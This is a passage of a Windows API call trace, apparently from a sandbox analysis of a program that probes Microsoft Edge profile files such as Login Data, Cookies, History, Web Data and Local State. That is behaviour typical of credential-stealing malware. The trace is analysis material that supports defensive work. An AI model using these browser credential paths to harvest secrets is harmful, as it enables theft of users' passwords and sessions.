returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x8b) returned 0x61c790 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x6200f0 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6200f0, Size=0x9b) returned 0x611f60 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4e) returned 0x620730 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0xa3) returned 0x624900 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.603] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3c0, Size=0x52) returned 0x618470 [0180.603] GetProcessHeap () returned 0x5f0000 [0180.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.604] GetProcessHeap () returned 0x5f0000 [0180.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.604] GetProcessHeap () returned 0x5f0000 [0180.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c790 | out: hHeap=0x5f0000) returned 1 [0180.604] GetProcessHeap () returned 0x5f0000 [0180.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.604] GetProcessHeap () returned 0x5f0000 [0180.604] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f470 | out: hHeap=0x5f0000) returned 1 [0180.604] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.604] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Web Data.bak") returned 0 [0180.605] GetProcessHeap () returned 0x5f0000 [0180.605] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618470 | out: hHeap=0x5f0000) returned 1 [0180.605] GetProcessHeap () returned 0x5f0000 [0180.605] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.605] GetProcessHeap () returned 0x5f0000 [0180.605] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.605] GetProcessHeap () returned 0x5f0000 [0180.605] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f400 [0180.606] lstrlenA (lpString="") returned 0 [0180.606] GetProcessHeap () returned 0x5f0000 [0180.606] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f300 [0180.606] lstrcpyA (in: lpString1=0x61f300, lpString2="" | out: lpString1="") returned="" [0180.606] GetProcessHeap () returned 0x5f0000 [0180.606] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613830 [0180.606] GetProcessHeap () returned 0x5f0000 [0180.606] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f3d0 [0180.606] ResetEvent (hEvent=0xc) returned 1 [0180.606] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3d0 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613830 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f400 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3b0 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.616] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f340 | out: hHeap=0x5f0000) returned 1 [0180.616] GetProcessHeap () returned 0x5f0000 [0180.617] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f330 | out: hHeap=0x5f0000) returned 1 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f2e0 | out: hHeap=0x5f0000) returned 1 [0180.617] lstrlenA (lpString=0x0) returned 0 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f300 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f440 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615d60 [0180.617] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x5f0000) returned 1 [0180.617] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5ce830, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f470 [0180.617] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.617] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.617] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x8b) returned 0x61c310 [0180.617] GetProcessHeap () returned 0x5f0000 [0180.618] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620550 [0180.618] GetProcessHeap () returned 0x5f0000 [0180.618] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0x99) returned 0x611f60 [0180.618] GetProcessHeap () returned 0x5f0000 [0180.618] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4d) returned 0x620820 [0180.618] GetProcessHeap () returned 0x5f0000 [0180.632] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620820, Size=0xa1) returned 0x624900 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3c0, Size=0x51) returned 0x6185f0 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c310 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f470 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.632] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies.bak") returned 0 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6185f0 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f440 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.632] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f300 | out: hHeap=0x5f0000) returned 1 [0180.632] GetProcessHeap () returned 0x5f0000 [0180.633] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3f0 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615dc0 [0180.633] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x5f0000) returned 1 [0180.633] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.633] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613440 [0180.633] lstrcpyA (in: lpString1=0x613440, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613320 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613aa0 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613aa0, Size=0x8b) returned 0x61c9d0 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620550 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0x9f) returned 0x611f60 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613440, Size=0x50) returned 0x6208c0 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.633] GetProcessHeap () returned 0x5f0000 [0180.633] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c9d0 | out: hHeap=0x5f0000) returned 1 [0180.633] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.633] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data") returned 0 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613320 | out: hHeap=0x5f0000) returned 1 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6208c0 | out: hHeap=0x5f0000) returned 1 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f340 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ca0 [0180.634] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x5f0000) returned 1 [0180.634] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.634] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.634] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6136e0 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6136e0, Size=0x8b) returned 0x61cd30 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x6207d0 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6207d0, Size=0x99) returned 0x611f60 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4d) returned 0x620820 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.634] GetProcessHeap () returned 0x5f0000 [0180.634] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61cd30 | out: hHeap=0x5f0000) returned 1 [0180.634] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.635] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\History") returned 0 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f320 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.635] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.635] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.635] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.635] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613ad0 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613ad0, Size=0x8b) returned 0x61c0d0 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620690 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620690, Size=0x9b) returned 0x611f60 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4e) returned 0x620230 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.635] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.635] GetProcessHeap () returned 0x5f0000 [0180.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c0d0 | out: hHeap=0x5f0000) returned 1 [0180.636] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.636] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Web Data") returned 0 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620230 | out: hHeap=0x5f0000) returned 1 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f400 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.636] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.636] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.636] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.636] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613860 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.636] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613860, Size=0x8b) returned 0x61c4c0 [0180.636] GetProcessHeap () returned 0x5f0000 [0180.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620550 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620550, Size=0xa7) returned 0x624900 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x54) returned 0x618290 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624900 | out: hHeap=0x5f0000) returned 1 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c4c0 | out: hHeap=0x5f0000) returned 1 [0180.637] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.637] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\..\\Local State") returned 0 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f2e0 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615f60 [0180.637] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x5f0000) returned 1 [0180.637] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.637] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.637] GetProcessHeap () returned 0x5f0000 [0180.637] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.637] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.637] GetProcessHeap () returned 0x5f0000 [0180.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613440 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x6137a0 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6137a0, Size=0x8b) returned 0x61c790 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620730 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620730, Size=0x99) returned 0x611f60 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613320, Size=0x4d) returned 0x620550 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61c790 | out: hHeap=0x5f0000) returned 1 [0180.638] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="PathFileExistsA") returned 0x7ffb262f5690 [0180.638] PathFileExistsA (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Cookies") returned 0 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613440 | out: hHeap=0x5f0000) returned 1 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620550 | out: hHeap=0x5f0000) returned 1 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6247e0 | out: hHeap=0x5f0000) returned 1 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f470 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x615ea0 [0180.638] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetSpecialFolderPathA") returned 0x7ffb26a71450 [0180.638] GetProcessHeap () returned 0x5f0000 [0180.638] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x5f0000) returned 1 [0180.639] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x5cfbf0, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 1 [0180.639] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 35 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613320 [0180.639] lstrcpyA (in: lpString1=0x613320, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local" [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x28) returned 0x613440 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x613920 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613920, Size=0x95) returned 0x611f60 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4b) returned 0x620960 [0180.639] GetProcessHeap () returned 0x5f0000 [0180.639] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620960, Size=0xa9) returned 0x6247e0 [0180.639] GetProcessHeap () returned 0x5f0000 